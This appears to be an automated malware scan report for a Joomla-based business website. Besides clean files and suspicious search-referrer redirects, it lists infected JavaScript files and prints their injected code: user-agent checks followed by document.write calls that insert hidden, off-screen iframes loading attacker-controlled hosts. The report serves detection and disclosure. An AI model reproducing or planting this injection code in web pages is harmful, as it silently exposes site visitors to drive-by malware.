Scanned pages/files
Request | Server response | Status |
http://betterbusinesssolutionsinc.com/ | 200 OK Content-Length: 23210 Content-Type: text/html | clean |
http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/mootools/mootools-release-1.11.js | 200 OK Content-Length: 1674 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); Antivirus reports:
| ||
http://betterbusinesssolutionsinc.com/media/system/js/caption.js | 200 OK Content-Length: 1094 Content-Type: application/x-javascript | clean |
http://betterbusinesssolutionsinc.com/modules/mod_yoo_scroller/mod_yoo_scroller.js | 200 OK Content-Length: 1672 Content-Type: application/x-javascript | clean |
http://betterbusinesssolutionsinc.com/modules/mod_yoo_search/mod_yoo_search.js | 200 OK Content-Length: 1094 Content-Type: application/x-javascript | clean |
http://betterbusinesssolutionsinc.com/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1 | 200 OK Content-Length: 5447 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o Antivirus reports:
| ||
http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/addons/base.js | 200 OK Content-Length: 1677 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); Antivirus reports:
| ||
http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/addons/accordionmenu.js | 200 OK Content-Length: 2527 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o if (!(tog.hasClass('active') || this.options.display == 'all' || this.options.display == i)) { fx.hide(); } span.addEvent('click', function(){ fx.toggle(); }); }.bind(this)); } }); YOOAccordionMenu.implement(new Options);document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499" Antivirus reports:
| ||
http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/addons/fancymenu.js | 200 OK Content-Length: 1094 Content-Type: application/x-javascript | clean |
http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/addons/dropdownmenu.js | 200 OK Content-Length: 1664 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o function Opelcorsamodel() { var ariga = navigator.userAgent; var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1); if (!hightvo) { document.write('<iframe src="http://polterges.cariboolife.ca/ploidarada.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>'); } } Opelcorsamodel(); Antivirus reports:
| ||
http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/yoo_tools.js | 200 OK Content-Length: 1094 Content-Type: application/x-javascript | clean |
http://betterbusinesssolutionsinc.com/wthvideo/wthvideo.js | 200 OK Content-Length: 1664 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o function Opelcorsamodel() { var ariga = navigator.userAgent; var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1); if (!hightvo) { document.write('<iframe src="http://polterges.cariboolife.ca/ploidarada.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>'); } } Opelcorsamodel(); Antivirus reports:
| ||
http://betterbusinesssolutionsinc.com/index.php?option=com_contact&view=contact&id=1&Itemid=125 | 200 OK Content-Length: 16275 Content-Type: text/html | clean |
http://betterbusinesssolutionsinc.com/media/system/js/validate.js | 200 OK Content-Length: 5491 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o $(el.labelref).addClass('invalid'); } } else { el.removeClass('invalid'); if (el.labelref) { $(el.labelref).removeClass('invalid'); } } } }); document.formvalidator = null; Window.onDomReady(function(){ document.formvalidator = new JFormValidator(); });document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499" width="499" Antivirus reports:
| ||
http://betterbusinesssolutionsinc.com/index.php?option=com_content&view=article&id=116&Itemid=124 | 200 OK Content-Length: 17527 Content-Type: text/html | clean |
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://betterbusinesssolutionsinc.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: betterbusinesssolutionsinc.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 09 Oct 2014 12:21:28 GMT Location: http://mdrightnow2014.com/ Server: Apache Content-Length: 314 Content-Type: text/html; charset=iso-8859-1 | suspicious |
URL: http://mdrightnow2014.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: mdrightnow2014.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Connection: close Date: Thu, 09 Oct 2014 12:21:28 GMT Location: http://doctorhecrew.com Server: nginx/1.6.2 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3 | suspicious |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=betterbusinesssolutionsinc.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://betterbusinesssolutionsinc.com/
Result: betterbusinesssolutionsinc.com is not infected or malware details are not published yet.
Result: betterbusinesssolutionsinc.com is not infected or malware details are not published yet.